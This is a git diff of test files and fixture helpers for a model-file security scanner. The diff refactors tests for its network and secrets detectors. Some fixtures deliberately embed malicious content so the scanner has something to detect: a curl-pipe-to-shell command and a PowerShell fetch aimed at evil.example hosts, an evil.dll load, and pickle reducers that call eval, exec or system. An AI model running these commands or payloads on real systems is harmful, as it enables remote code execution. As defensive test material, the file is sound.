checks.""" - class TrackingBytes(bytes): - lower_calls = 0 - - def lower(self) -> bytes: - self.lower_calls += 1 - return super().lower() - detector = NetworkCommDetector({"custom_blacklist": [b"blocked.example", b"evil.example"]}) - data = TrackingBytes(b"https://blocked.example/payload") + data = _LowerCountingBytes(b"https://blocked.example/payload") detector._check_blacklist(data, "payload.bin") @@ -8913,15 +8597,8 @@ def lower(self) -> bytes: def test_blacklist_scan_skips_lowering_without_configured_domains(self) -> None: """Avoid touching payload bytes when no blacklist entries are configured.""" - class TrackingBytes(bytes): - lower_calls = 0 - - def lower(self) -> bytes: - self.lower_calls += 1 - return super().lower() - detector = NetworkCommDetector() - data = TrackingBytes(b"https://blocked.example/payload") + data = _LowerCountingBytes(b"https://blocked.example/payload") detector._check_blacklist(data, "payload.bin") @@ -9683,21 +9360,13 @@ def test_filtered_url_credentials_do_not_consume_shared_evidence_budget( url_template: str, ) -> None: """URL redaction must classify filtered credential-shaped domains before shared evidence.""" - calls = 0 - original_redactor = network_comm._redact_network_evidence - - def count_shared_redaction(text: str) -> str: - nonlocal calls - calls += 1 - return original_redactor(text) - - monkeypatch.setattr(network_comm, "_redact_network_evidence", count_shared_redaction) + calls = _count_shared_redactions(monkeypatch) data = "\n".join(url_template.format(index=index) for index in range(40)).encode() detector = NetworkCommDetector() findings = detector.scan(data, "README.md") - assert calls == 0 + assert calls[0] == 0 assert detector._evidence_redaction_classifications == 0 assert not detector._evidence_redaction_limit_reached assert not any(finding["type"] == "detector_finding_limit" for finding in findings) @@ -9709,20 +9378,12 @@ def test_filtered_bare_credential_uses_shared_evidence_redaction( monkeypatch: pytest.MonkeyPatch, ) -> None: """A bare credential-shaped domain still needs shared evidence classification.""" - calls = 0 - original_redactor = network_comm._redact_network_evidence - - def count_shared_redaction(text: str) -> str: - nonlocal calls - calls += 1 - return original_redactor(text) - - monkeypatch.setattr(network_comm, "_redact_network_evidence", count_shared_redaction) + calls = _count_shared_redactions(monkeypatch) detector = NetworkCommDetector() findings = detector.scan(b"api_key=secret.invalid", "tokens.txt") - assert calls == 1 + assert calls[0] == 1 assert detector._evidence_redaction_classifications == 1 assert not detector._evidence_redaction_limit_reached assert "secret.invalid" not in json.dumps(findings, sort_keys=True) @@ -9750,3 +9411,111 @@ def preserve_marked_evidence(text: str) -> str: assert findings[-1]["type"] == "detector_finding_limit" assert findings[-1]["analysis_incomplete"] is True assert findings[-1]["max_classifications"] == network_comm._MAX_EVIDENCE_REDACTION_CLASSIFICATIONS + + +def _count_shared_redactions(monkeypatch: pytest.MonkeyPatch) -> list[int]: + calls = [0] + original_redactor = network_comm._redact_network_evidence + + def count_shared_redaction(text: str) -> str: + calls[0] += 1 + return original_redactor(text) + + monkeypatch.setattr(network_comm, "_redact_network_evidence", count_shared_redaction) + return calls + + +def _assert_endpoint_credential_isolation( + data: bytes, secret: str, endpoint_type: str, endpoint_field: str, endpoint: str +) -> None: + findings = NetworkCommDetector().scan(data, "hook.py") + + assert secret not in json.dumps(findings, sort_keys=True) + assert any(finding.get("type") == endpoint_type and finding.get(endpoint_field) == endpoint for finding in findings) + + +def _assert_readme_network_info(data: bytes) -> None: + findings = NetworkCommDetector().scan(data, "README.md") + + assert findings + assert all(finding["severity"] == "INFO" for finding in findings) + assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}] + + +def _assert_network_library_and_function(data: bytes, filename: str) -> None: + findings = NetworkCommDetector().scan(data, filename) + + assert any(finding["type"] == "network_library" for finding in findings) + assert any(finding["type"] == "network_function" for finding in findings) + + +def _assert_readme_without_network_calls(data: bytes) -> None: + findings = NetworkCommDetector().scan(data, "README.md") + + assert not [finding for finding in findings if finding["type"] in {"network_library", "network_function"}] + + +def _assert_redacted_path_token(findings: list[dict[str, Any]], path_token: str, expected_url: str) -> None: + url_finding = next(finding for finding in findings if finding["type"] == "url_detected") + assert url_finding["url"] == expected_url + assert path_token not in json.dumps(url_finding, sort_keys=True) + + +def _assert_long_url_secret_isolation(case_secret: str) -> None: + secret = case_secret + data = ( + b"https://example.com/" + + b"a" * (network_comm._MAX_URL_TEXT_LOOKUP_BYTES + 1) + + f"/api_key/{secret}/model.bin".encode() + ) + + findings = NetworkCommDetector().scan(data, "hook.py") + + assert secret not in json.dumps(findings, sort_keys=True) + + +def _assert_serialized_path_token_isolation(findings: list[dict[str, Any]], path_token: str) -> None: + serialized = json.dumps(findings, sort_keys=True) + assert "https://example.com/download//model.bin" in serialized + assert path_token not in serialized + + +def _assert_hf_repository_url(detector: NetworkCommDetector, data: bytes, repo_id: str, url_prefix: str) -> None: + findings = detector.scan(data, "metadata.txt") + url_finding = next(finding for finding in findings if finding["type"] == "url_detected") + assert url_finding["url"] == f"{url_prefix}{repo_id}" + + +class _LowerCountingBytes(bytes): + lower_calls = 0 + + def lower(self) -> bytes: + self.lower_calls += 1 + return super().lower() + + +def _record_image_validation(monkeypatch: pytest.MonkeyPatch) -> list[bytes]: + validated_examples: list[bytes] = [] + original_validator = network_comm._is_valid_official_readme_sample_image_example + + def count_validation(example: bytes, **kwargs: Any) -> bool: + validated_examples.append(example) + return original_validator(example, **kwargs) + + monkeypatch.setattr(network_comm, "_is_valid_official_readme_sample_image_example", count_validation) + return validated_examples + + +def _record_proof_budget( + monkeypatch: pytest.MonkeyPatch, +) -> tuple[network_comm._ReadmeImageExampleProofBudget, list[int]]: + proof_budget = network_comm._ReadmeImageExampleProofBudget() + proof_charges: list[int] = [] + original_consume = proof_budget.consume_named_callable + + def record_proof_work(work: int) -> bool: + proof_charges.append(work) + return original_consume(work) + + monkeypatch.setattr(proof_budget, "consume_named_callable", record_proof_work) + return proof_budget, proof_charges diff --git a/tests/detectors/test_secrets_detector.py b/tests/detectors/test_secrets_detector.py index 0e48ed118..d68259266 100644 --- a/tests/detectors/test_secrets_detector.py +++ b/tests/detectors/test_secrets_detector.py @@ -59,38 +59,28 @@ def test_detect_aws_keys(self): def test_detect_openai_keys(self): """Test detection of OpenAI API keys.""" - detector = SecretsDetector() - # Test OpenAI API key (48 chars after sk-) - text = "OPENAI_API_KEY=sk-abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJ12" - findings = detector.scan_text(text) - assert len(findings) > 0 - assert any("OpenAI" in f["secret_type"] for f in findings) + _assert_secret_type_detection( + ("OPENAI_API_KEY=sk-abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJ12"), ("OpenAI") + ) def test_detect_github_tokens(self): """Test detection of GitHub tokens.""" - detector = SecretsDetector() - # Test GitHub personal token - text = "github_token=ghp_abcdefghijklmnopqrstuvwxyz0123456789" - findings = detector.scan_text(text) - assert len(findings) > 0 - assert any("GitHub" in f["secret_type"] for f in findings) + _assert_secret_type_detection(("github_token=ghp_abcdefghijklmnopqrstuvwxyz0123456789"), ("GitHub")) def test_detect_jwt_tokens(self): """Test detection of JWT tokens.""" - detector = SecretsDetector() - # Test a non-example JWT-shaped token. The well-known JWT.io sample is # intentionally suppressed as documentation/test data. - text = ( - "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9." - "eyJzdWIiOiJ1c2VyMTIzIiwic2NvcGUiOiJhZG1pbiIsImlhdCI6MTcwMDAwMDAwMH0." - "q1w2e3r4t5y6u7i8o9p0asdfghjklzxcvbnmQWERty" + _assert_secret_type_detection( + ( + "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9." + "eyJzdWIiOiJ1c2VyMTIzIiwic2NvcGUiOiJhZG1pbiIsImlhdCI6MTcwMDAwMDAwMH0." + "q1w2e3r4t5y6u7i8o9p0asdfghjklzxcvbnmQWERty" + ), + ("JWT"), ) - findings = detector.scan_text(text) - assert len(findings) > 0 - assert any("JWT" in f["secret_type"] for f in findings) def test_known_example_jwt_is_suppressed_by_default(self) -> None: """The JWT.io example token should not produce warning-level noise.""" @@ -1250,13 +1240,8 @@ def test_detect_database_connections(self): def test_detect_private_keys(self): """Test detection of private keys.""" - detector = SecretsDetector() - # Test RSA private key header - text = "-----BEGIN RSA PRIVATE KEY-----\nMIIEpAIBAAKCAQEA..." - findings = detector.scan_text(text) - assert len(findings) > 0 - assert any("Private Key" in f["secret_type"] for f in findings) + _assert_secret_type_detection(("-----BEGIN RSA PRIVATE KEY-----\nMIIEpAIBAAKCAQEA..."), ("Private Key")) def test_high_entropy_detection(self): """Test detection of high-entropy regions.""" @@ -1608,6 +1593,15 @@ def test_secret_finding_limit_is_explicit() -> None: assert findings[-1]["analysis_incomplete"] is True +def _assert_secret_type_detection(case_text: str, case_secret_type: str) -> None: + detector = SecretsDetector() + + text = case_text + findings = detector.scan_text(text) + assert len(findings) > 0 + assert any(case_secret_type in f["secret_type"] for f in findings) + + def test_basic_auth_finding_limit_is_explicit_and_redacted() -> None: detector = SecretsDetector({"max_findings": 2}) tokens = [_basic_auth_token(f"user{index}:pass{index}".encode()) for index in range(5)] diff --git a/tests/helpers/assertions.py b/tests/helpers/assertions.py new file mode 100644 index 000000000..dc41a3892 --- /dev/null +++ b/tests/helpers/assertions.py @@ -0,0 +1,11 @@ +"""Shared substring assertions for scanner evidence.""" + + +def _assert_absent(value: str, *substrings: str) -> None: + for substring in substrings: + assert substring not in value + + +def _assert_present(value: str, *substrings: str) -> None: + for substring in substrings: + assert substring in value diff --git a/tests/helpers/cache.py b/tests/helpers/cache.py new file mode 100644 index 000000000..fab58b89f --- /dev/null +++ b/tests/helpers/cache.py @@ -0,0 +1,73 @@ +"""Shared result helpers and assertions for fail-closed scan cache behavior.""" + +from pathlib import Path +from typing import Any + +from modelaudit.cache import get_cache_manager, reset_cache_manager +from modelaudit.core import determine_exit_code, scan_model_directory_or_file +from modelaudit.models import ModelAuditResultModel +from modelaudit.scanner_results import ( + ACTIONABLE_FAILED_CHECKS_METADATA_KEY, + INCONCLUSIVE_SCAN_OUTCOME, + Check, + IssueSeverity, + ScanResult, +) + + +def assert_inconclusive_not_cached( + path: Path, + expected_reason: str, + cache_dir: Path, + **scan_kwargs: Any, +) -> None: + reset_cache_manager() + try: + first = scan_model_directory_or_file( + str(path), + cache_enabled=True, + cache_dir=str(cache_dir), + min_cache_file_size=0, + **scan_kwargs, + ) + second = scan_model_directory_or_file( + str(path), + cache_enabled=True, + cache_dir=str(cache_dir), + min_cache_file_size=0, + **scan_kwargs, + ) + + for aggregate in (first, second): + metadata = aggregate.file_metadata[str(path)] + assert metadata["scan_outcome"] == INCONCLUSIVE_SCAN_OUTCOME + assert expected_reason in metadata["scan_outcome_reasons"] + assert not [ + issue for issue in aggregate.issues if issue.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} + ] + assert determine_exit_code(aggregate) == 2 + assert get_cache_manager(str(cache_dir), enabled=True).get_stats()["total_entries"] == 0 + finally: + reset_cache_manager() + + +def private_actionable_failed_checks(scan_result: dict[str, Any]) -> list[dict[str, Any]]: + private_metadata = scan_result.get("_private_metadata") + if not isinstance(private_metadata, dict): + return [] + actionable_failed_checks = private_metadata.get(ACTIONABLE_FAILED_CHECKS_METADATA_KEY) + if not isinstance(actionable_failed_checks, list): + return [] + return [entry for entry in actionable_failed_checks if isinstance(entry, dict)] + + +def scan_without_cache(path: Path) -> ModelAuditResultModel: + return scan_model_directory_or_file(str(path), cache_scan_results=False) + + +def single_file_metadata(aggregate: Any) -> Any: + return next(iter(aggregate.file_metadata.values())) + + +def check_by_name(result: ScanResult, name: str) -> list[Check]: + return [check for check in result.checks if check.name == name] diff --git a/tests/helpers/file_creators.py b/tests/helpers/file_creators.py index db32e9023..eb4428e9e 100644 --- a/tests/helpers/file_creators.py +++ b/tests/helpers/file_creators.py @@ -6,6 +6,7 @@ """ import base64 +import io import json import pickle import struct @@ -14,6 +15,11 @@ from pathlib import Path from typing import Any +import pytest + +from tests.helpers.pickle_framework import SystemCommandPayload as SystemCommandPayload +from tests.helpers.pickle_framework import pickle_short_binunicode as pickle_short_binunicode + _VALID_JPEG_1X1 = base64.b64decode( "/9j/4AAQSkZJRgABAQEASABIAAD/2wBDAP//////////////////////////////////////////////////////////////////////////////////////" "2wBDAf//////////////////////////////////////////////////////////////////////////////////////" @@ -118,21 +124,12 @@ def create_malicious_pickle(path: Path, payload_type: str = "os_system") -> Path return path -def _encode_proto_varint(value: int) -> bytes: - encoded = bytearray() - while value >= 0x80: - encoded.append((value & 0x7F) | 0x80) - value >>= 7 - encoded.append(value) - return bytes(encoded) - - -def _coreml_field_varint(field_number: int, value: int) -> bytes: - return _encode_proto_varint(field_number << 3) + _encode_proto_varint(value) +def protobuf_varint_field(field_number: int, value: int) -> bytes: + return _encode_protobuf_varint(field_number << 3) + _encode_protobuf_varint(value) -def _coreml_field_bytes(field_number: int, value: bytes) -> bytes: - return _encode_proto_varint((field_number << 3) | 2) + _encode_proto_varint(len(value)) + value +def protobuf_bytes_field(field_number: int, value: bytes) -> bytes: + return _encode_protobuf_varint((field_number << 3) | 2) + _encode_protobuf_varint(len(value)) + value def create_mock_coreml( @@ -144,19 +141,23 @@ def create_mock_coreml( model_type_padding: int = 0, ) -> Path: """Create a minimal structurally valid CoreML model fixture.""" - metadata = _coreml_field_bytes(1, b"Mock CoreML model") - description = _coreml_field_bytes(100, metadata) - layer = _coreml_field_bytes(1, b"layer_1") + metadata = protobuf_bytes_field(1, b"Mock CoreML model") + description = protobuf_bytes_field(100, metadata) + layer = protobuf_bytes_field(1, b"layer_1") if custom_class is not None: - custom = _coreml_field_bytes(10, custom_class.encode("utf-8")) + custom = protobuf_bytes_field(10, custom_class.encode("utf-8")) if custom_parameter is not None: key, value = custom_parameter - parameter_value = _coreml_field_bytes(20, value.encode("utf-8")) - parameter = _coreml_field_bytes(1, key.encode("utf-8")) + _coreml_field_bytes(2, parameter_value) - custom += _coreml_field_bytes(30, parameter) - layer += _coreml_field_bytes(500, custom) - neural_network = _coreml_field_bytes(1, layer) + (b"\x00" * model_type_padding) - fields = [_coreml_field_varint(1, 8), _coreml_field_bytes(2, description), _coreml_field_bytes(500, neural_network)] + parameter_value = protobuf_bytes_field(20, value.encode("utf-8")) + parameter = protobuf_bytes_field(1, key.encode("utf-8")) + protobuf_bytes_field(2, parameter_value) + custom += protobuf_bytes_field(30, parameter) + layer += protobuf_bytes_field(500, custom) + neural_network = protobuf_bytes_field(1, layer) + (b"\x00" * model_type_padding) + fields = [ + protobuf_varint_field(1, 8), + protobuf_bytes_field(2, description), + protobuf_bytes_field(500, neural_network), + ] if model_type_first: fields = [fields[1], fields[2], fields[0]] model = b"".join(fields) @@ -193,11 +194,7 @@ def create_mock_pytorch_zip( if malicious: # Add a malicious class that would execute code on unpickle - class MaliciousClass: - def __reduce__(self): - return (eval, ("print('malicious code')",)) - - data["malicious"] = MaliciousClass() + data["malicious"] = EvalPayload(("print('malicious code')",)) pickled_data = pickle.dumps(data) zf.writestr(f"{member_prefix}data.pkl", pickled_data) @@ -438,3 +435,324 @@ def create_mock_h5(path: Path, *, keras_style: bool = False) -> Path: model_config = f.create_group("model_config") model_config.attrs["class_name"] = "Sequential" return path + + +def write_hf_cachedir_tag(path: Path) -> None: + path.parent.mkdir(parents=True, exist_ok=True) + path.write_text( + "Signature: 8a477f597d28d172789f06886806bc55\n" + "# This file is a cache directory tag created by huggingface_hub.\n" + "# For information about cache directory tags, see:\n" + "#\thttps://bford.info/cachedir/\n", + encoding="utf-8", + ) + + +def ubjson_key(key: bytes) -> bytes: + return b"U" + bytes([len(key)]) + key + + +def ubjson_string(value: bytes) -> bytes: + return b"SL" + len(value).to_bytes(8, byteorder="big", signed=True) + value + + +def xgboost_ubjson_probe( + *, root_padding: int = 0, learner_padding: int = 0, learner_noop: bool = False, malicious: bool = False +) -> bytes: + root_body = b"" + if root_padding: + root_body += ubjson_key(b"metadata") + ubjson_string(b"x" * root_padding) + learner_body = b"" + if learner_padding: + learner_body += ubjson_key(b"metadata") + ubjson_string(b"x" * learner_padding) + learner_body += ubjson_key(b"learner_model_param") + b"{}" + if malicious: + learner_body += ubjson_key(b"malicious_code") + ubjson_string(b"system(cpu)") + learner_value = (b"N" if learner_noop else b"") + b"{" + learner_body + b"}" + return b"{" + root_body + ubjson_key(b"learner") + learner_value + ubjson_key(b"version") + b"[]" + b"}" + + +def write_hf_tokenizer_json(path: Path, extra_fields: dict[str, Any] | None = None) -> Path: + payload: dict[str, Any] = { + "version": "1.0", + "added_tokens": [], + "model": { + "type": "BPE", + "vocab": {"hello": 0}, + "merges": [], + }, + } + if extra_fields: + payload.update(extra_fields) + path.write_text(json.dumps(payload), encoding="utf-8") + return path + + +def write_ordered_hf_tokenizer_json( + path: Path, + *, + late_fields: str = "", + padding_size: int = 0, + model_fields: str = '"type":"BPE","vocab":{"hello":0},"merges":[]', + version_json: str = '"1.0"', +) -> Path: + padding = f',"padding":"{"x" * padding_size}"' if padding_size else "" + path.write_text( + (f'{{"version":{version_json},"added_tokens":[],"model":{{{model_fields}}}{padding}{late_fields}}}'), + encoding="utf-8", + ) + return path + + +def xgboost_ubjson_uncounted_null_array_probe(item_count: int) -> bytes: + learner = ( + b"{" + ubjson_key(b"learner_model_param") + b"{}" + ubjson_key(b"payload") + b"[" + (b"Z" * item_count) + b"]}" + ) + return b"{" + ubjson_key(b"learner") + learner + b"}" + + +def xgboost_ubjson_noop_before_counted_root_header_probe() -> bytes: + return ( + b"{N#U\x02" + + ubjson_key(b"learner") + + b"{" + + ubjson_key(b"learner_model_param") + + b"{}" + + b"}" + + ubjson_key(b"version") + + b"[]" + ) + + +def write_truncated_ordered_hf_tokenizer_json(path: Path, *, padding_size: int) -> Path: + path.write_text( + ( + '{"version":"1.0","added_tokens":[],' + '"model":{"type":"BPE","vocab":{"hello":0},"merges":[]},' + f'"padding":"{"x" * padding_size}' + ), + encoding="utf-8", + ) + return path + + +def write_malicious_lightgbm(path: Path, valid: bool = True) -> None: + body = "tree=0\nversion=v4\nnum_class=1\n" + if valid: + body += ( + "num_tree_per_iteration=1\nmax_feature_idx=2\ntree_sizes=12\nnum_leaves=2\n" + "split_feature=0\nleaf_value=0.1 0.2\n" + "metadata=os.system('curl https://collector.evil.example/payload.sh | sh')\n" + "callback_url=https://collector.evil.example/payload.sh\n" + ) + path.write_text(body, encoding="utf-8") + + +def bpe_merges_payload(min_bytes: int = 3 * 1024 * 1024) -> bytes: + lines = ["#version: 0.2"] + total_bytes = len(lines[0]) + 1 + index = 0 + while total_bytes <= min_bytes: + line = f"token_{index % 8192} token_{(index * 17) % 8192}" + lines.append(line) + total_bytes += len(line) + 1 + index += 1 + return ("\n".join(lines) + "\n").encode("utf-8") + + +def joblib_numpy_raw_segment(prefix_length: int, raw_data: bytes) -> bytes: + padding_length = 16 - ((prefix_length + 1) % 16) + return bytes([padding_length]) + (b"\xff" * padding_length) + raw_data + + +def printable_unknown_proto_prefix(min_bytes: int) -> bytes: + field = b"z " + (b"x" * 32) + return field * ((min_bytes // len(field)) + 1) + + +def bert_vocab_payload(min_bytes: int = 16 * 1024) -> bytes: + tokens = ["[PAD]", "[UNK]", "[CLS]", "[SEP]", "[MASK]"] + tokens.extend(f"[unused{index}]" for index in range(2048)) + tokens.extend(f"token_{index}" for index in range(2048)) + payload = ("\n".join(tokens) + "\n").encode("utf-8") + assert len(payload) > min_bytes + return payload + + +def write_hf_download_metadata(path: Path) -> None: + path.parent.mkdir(parents=True, exist_ok=True) + path.write_text( + "c5ee24cb16019beea0893ab7796b1df96625c6b8\n821d1aa69520101d6e0737f78a042ae25b19e5c0\n1712656091.123\n", + encoding="utf-8", + ) + + +def write_malicious_cntk(path: Path, include_structure: bool = True) -> None: + prefix = b"\x08\x01\x12\x11\x0a\x07version\x12\x06\x08\x01\x10\x03(\x02\x12\x09\x0a\x03uid\x12\x02ab" + structure = b" CompositeFunction primitive_functions " if include_structure else b"" + payload = b" native_user_function loadlibrary C:\\temp\\evil.dll powershell -c curl http://evil.example/p.sh " + path.write_bytes(prefix + structure + payload) + + +def xgboost_ubjson_counted_null_array_probe() -> bytes: + max_count = ((1 << 63) - 1).to_bytes(8, byteorder="big", signed=True) + learner = b"{" + ubjson_key(b"learner_model_param") + b"{}" + ubjson_key(b"payload") + b"[$Z#L" + max_count + b"}" + return b"{" + ubjson_key(b"learner") + learner + ubjson_key(b"version") + b"[]" + b"}" + + +def pickle_binunicode_text(value: str) -> bytes: + encoded = value.encode("utf-8") + return b"X" + len(encoded).to_bytes(4, "little") + encoded + + +def build_printable_utf8_ambiguous_binary_route() -> bytes: + """Build printable UTF-8 bytes that still require binary fail-closed routing.""" + return (b'""' + ("é" * 17).encode("utf-8")) * 4097 + + +def build_line_broken_printable_utf8_ambiguous_binary_route() -> bytes: + """Build line-broken printable UTF-8 bytes requiring binary fail-closed routing.""" + return (b'""' + ("é" * 17).encode("utf-8") + b"\n") * 4097 + + +def pickle_binunicode(value: bytes) -> bytes: + return b"X" + len(value).to_bytes(4, "little") + value + + +def write_sparse_safetensors_framing(path: Path, header_len: int) -> None: + with path.open("wb") as handle: + handle.write(struct.pack(" str: + assert local_dir is not None + path = Path(local_dir) / filename + path.parent.mkdir(parents=True, exist_ok=True) + path.write_bytes(payload if filename == "onnx/model.onnx" else sidecar_bytes) + return str(path) + + +def download_onnx_only_fixture( + payload: bytes, /, *, filename: str, local_dir: str | None = None, **_kwargs: object +) -> str: + assert filename == "onnx/model.onnx" + assert local_dir is not None + path = Path(local_dir) / filename + path.parent.mkdir(parents=True, exist_ok=True) + path.write_bytes(payload) + return str(path) + + +def download_payload_fixture(tmp_path: Path, payload: bytes, /, *, filename: str, **_kwargs: object) -> str: + path = tmp_path / filename + path.write_bytes(payload) + return str(path) + + +class ExecPayload: + """Serializable exec reducer for malicious scanner regression fixtures.""" + + def __reduce__(self) -> tuple[object, tuple[str]]: + return (exec, ("print('owned')",)) + + +class EvalPayload: + """Serializable eval reducer for malicious scanner regression fixtures.""" + + def __init__(self, args: tuple[str] = ("print('pwned')",)) -> None: + self.args = args + + def __reduce__(self) -> tuple[object, tuple[str]]: + return (eval, self.args) + + +def write_delayed_flax_cntk_overlap(path: Path) -> None: + from modelaudit.scanners import flax_msgpack_scanner + from modelaudit.utils.file.detection import FLAX_MSGPACK_STRUCTURE_READ_BYTES + + prefix = b"\x08\x01\x12\x11\x0a\x07version\x12\x06\x08\x01\x10\x03(\x02\x12\x09\x0a\x03uid\x12\x02ab" + structure = b" CompositeFunction primitive_functions " + delayed_flax_root = flax_msgpack_scanner.msgpack.packb( + {"params": {"w": [1, 2, 3]}, "__reduce__": "attacker_callable"}, + use_bin_type=True, + ) + path.write_bytes(prefix + structure + (b"\xc0" * (FLAX_MSGPACK_STRUCTURE_READ_BYTES + 1)) + delayed_flax_root) + + +def corrupt_zip_member_crc(path: Path, member_name: str) -> None: + """Patch a ZIP member CRC so reading the member raises BadZipFile. + + Full scanning sees a malformed entry. + """ + with zipfile.ZipFile(path) as archive: + info = archive.getinfo(member_name) + bad_crc = ((info.CRC + 1) & 0xFFFFFFFF).to_bytes(4, "little") + local_offset = info.header_offset + + data = bytearray(path.read_bytes()) + assert data[local_offset : local_offset + 4] == b"PK\x03\x04" + data[local_offset + 14 : local_offset + 18] = bad_crc + + member_name_bytes = member_name.encode("utf-8") + central_offset = 0 + while True: + central_offset = data.find(b"PK\x01\x02", central_offset) + assert central_offset >= 0 + name_length = int.from_bytes(data[central_offset + 28 : central_offset + 30], "little") + extra_length = int.from_bytes(data[central_offset + 30 : central_offset + 32], "little") + comment_length = int.from_bytes(data[central_offset + 32 : central_offset + 34], "little") + name_start = central_offset + 46 + name_end = name_start + name_length + if data[name_start:name_end] == member_name_bytes: + data[central_offset + 16 : central_offset + 20] = bad_crc + break + central_offset = name_end + extra_length + comment_length + + path.write_bytes(data) + + +def build_external_onnx_payload(tmp_path: Path, external_path: str, graph_name: str) -> bytes: + onnx = pytest.importorskip("onnx") + from onnx import TensorProto, helper + from onnx.onnx_ml_pb2 import StringStringEntryProto + + tensor = helper.make_tensor("W", TensorProto.FLOAT, [1], vals=[1.0]) + tensor.data_location = onnx.TensorProto.EXTERNAL + entry = StringStringEntryProto() + entry.key = "location" + entry.value = external_path + tensor.external_data.append(entry) + graph = helper.make_graph( + [helper.make_node("Relu", ["input"], ["output"], name="relu")], + graph_name, + [helper.make_tensor_value_info("input", TensorProto.FLOAT, [1])], + [helper.make_tensor_value_info("output", TensorProto.FLOAT, [1])], + initializer=[tensor], + ) + model_path = tmp_path / "fixture.onnx" + onnx.save(helper.make_model(graph), str(model_path)) + return model_path.read_bytes() + + +def write_binary_fixture(tmp_path: Path, filename: str, payload: bytes) -> Path: + path = tmp_path / filename + path.write_bytes(payload) + return path + + +def write_chunk_boundary_payload(path: Path, pattern: bytes, *, prefix_len: int, suffix: bytes = b"") -> None: + chunk_size = 1024 * 1024 + path.write_bytes(b"\x00" * (chunk_size - prefix_len) + pattern[:prefix_len] + pattern[prefix_len:] + suffix) + + +class ReadTrackingBuffer(io.BytesIO): + bytes_read = 0 + + def read(self, size: int | None = -1) -> bytes: + data = super().read(size) + self.bytes_read += len(data) + return data diff --git a/tests/helpers/frameworks.py b/tests/helpers/frameworks.py index 60ce26b8d..65cf54298 100644 --- a/tests/helpers/frameworks.py +++ b/tests/helpers/frameworks.py @@ -50,17 +50,12 @@ def wrapper(*args: Any, **kwargs: Any) -> Any: requires_dill = _make_requires_decorator("dill") -def skip_if_slow(reason: str = "Test is slow") -> pytest.MarkDecorator: - """Skip test in fast mode (when running with -m 'not slow').""" - return pytest.mark.slow - - -def skip_in_ci( - reason: str = "Test not suitable for CI", -) -> Callable[[Callable[..., Any]], Callable[..., Any]] | pytest.MarkDecorator: - """Skip test in CI environment.""" - import os - - if os.environ.get("CI"): - return pytest.mark.skip(reason=reason) - return lambda f: f +def has_tensorflow_runtime() -> bool: + try: + import tensorflow as tf + + # Avoid treating vendored protobuf-only stubs as full TensorFlow runtime. + # Those stubs are not sufficient for weight-distribution tests. + return bool(getattr(tf, "__version__", None)) and hasattr(tf, "constant") + except Exception: + return False diff --git a/tests/helpers/http.py b/tests/helpers/http.py new file mode 100644 index 000000000..9dc61acf6 --- /dev/null +++ b/tests/helpers/http.py @@ -0,0 +1,24 @@ +"""Deterministic response doubles for source download tests.""" + +from collections.abc import Iterator + +import requests + + +class FakeStreamingResponse: + def __init__(self, payload: bytes, *, status_code: int = 200, headers: dict[str, str] | None = None) -> None: + self.payload = payload + self.status_code = status_code + self.headers = headers or {} + self.cookies = requests.cookies.RequestsCookieJar() + self.closed = False + + def raise_for_status(self) -> None: + return None + + def iter_content(self, chunk_size: int = 1) -> Iterator[bytes]: + for offset in range(0, len(self.payload), chunk_size): + yield self.payload[offset : offset + chunk_size] + + def close(self) -> None: + self.closed = True diff --git a/tests/helpers/pickle_framework.py b/tests/helpers/pickle_framework.py new file mode 100644 index 000000000..81793e3e8 --- /dev/null +++ b/tests/helpers/pickle_framework.py @@ -0,0 +1,112 @@ +"""Typed bridge to the standalone package's test-only framework fixtures.""" + +from collections.abc import Callable +from importlib.util import module_from_spec, spec_from_file_location +from pathlib import Path +from typing import TYPE_CHECKING, Any, Protocol, cast + +if TYPE_CHECKING: + import pytest + +_SOURCE = Path(__file__).resolve().parents[2] / "packages/modelaudit-picklescan/tests/framework_fixtures.py" +_SPEC = spec_from_file_location("modelaudit_test_framework_fixtures", _SOURCE) +assert _SPEC is not None and _SPEC.loader is not None +_fixtures = module_from_spec(_SPEC) +_SPEC.loader.exec_module(_fixtures) + + +class _UnpickleOracle(Protocol): + def __call__(self, payload_path: Path, tmp_path: Path, *, mode: str, extension_code: int | None) -> None: ... + + +_PackageWriter = Callable[[Path], None] +_MarkerWriter = Callable[[Path, Path], None] +_assert_shadow_framework_unpickle_executes = cast(_UnpickleOracle, _fixtures._assert_shadow_framework_unpickle_executes) +_write_init_heavy_trusted_transformers_package = cast( + _PackageWriter, _fixtures._write_init_heavy_trusted_transformers_package +) +_write_sitecustomize_trusting_site_packages = cast(_MarkerWriter, _fixtures._write_sitecustomize_trusting_site_packages) +_write_init_inert_setstate_transformers_package = cast( + _MarkerWriter, _fixtures._write_init_inert_setstate_transformers_package +) +_write_rebindable_trusted_transformers_package = cast( + _PackageWriter, _fixtures._write_rebindable_trusted_transformers_package +) +_write_import_side_effect_transformers_package = cast( + _MarkerWriter, _fixtures._write_import_side_effect_transformers_package +) +_write_runtime_mutable_trusted_transformers_package = cast( + _PackageWriter, _fixtures._write_runtime_mutable_trusted_transformers_package +) +_write_enum_trusted_transformers_package = cast(_PackageWriter, _fixtures._write_enum_trusted_transformers_package) +_write_rebindable_trusted_torch_utils_package = cast( + _PackageWriter, _fixtures._write_rebindable_trusted_torch_utils_package +) +_write_cross_module_rebind_target_package = cast(_PackageWriter, _fixtures._write_cross_module_rebind_target_package) + + +class _SystemCommandPayloadFactory(Protocol): + def __call__(self, command: str, system_getter: Callable[[], Any] | None = None) -> object: ... + + +SystemCommandPayload = cast(_SystemCommandPayloadFactory, _fixtures.SystemCommandPayload) + + +class _DupHeavyPayload(Protocol): + def __call__(self, iterations: int) -> bytes: ... + + +class _MemoExpansionPayload(Protocol): + def __call__(self, iterations: int, *, inert_writes: int = 0) -> bytes: ... + + +class _StorageProtocol0Payload(Protocol): + def __call__(self, key: str, *, storage_qualname: str = "torch.FloatStorage", size: int | str = 1) -> bytes: ... + + +class _ShadowBuildPayload(Protocol): + def __call__(self, protocol: int = 4) -> bytes: ... + + +_binary_magic_tensor_storage_bytes = cast(Callable[[], bytes], _fixtures._binary_magic_tensor_storage_bytes) +_clear_ultralytics_modules = cast(Callable[[], None], _fixtures._clear_ultralytics_modules) +_float_storage_element_count_for_bytes = cast(Callable[[bytes], int], _fixtures._float_storage_element_count_for_bytes) +_force_framework_metadata_unresolved = cast( + 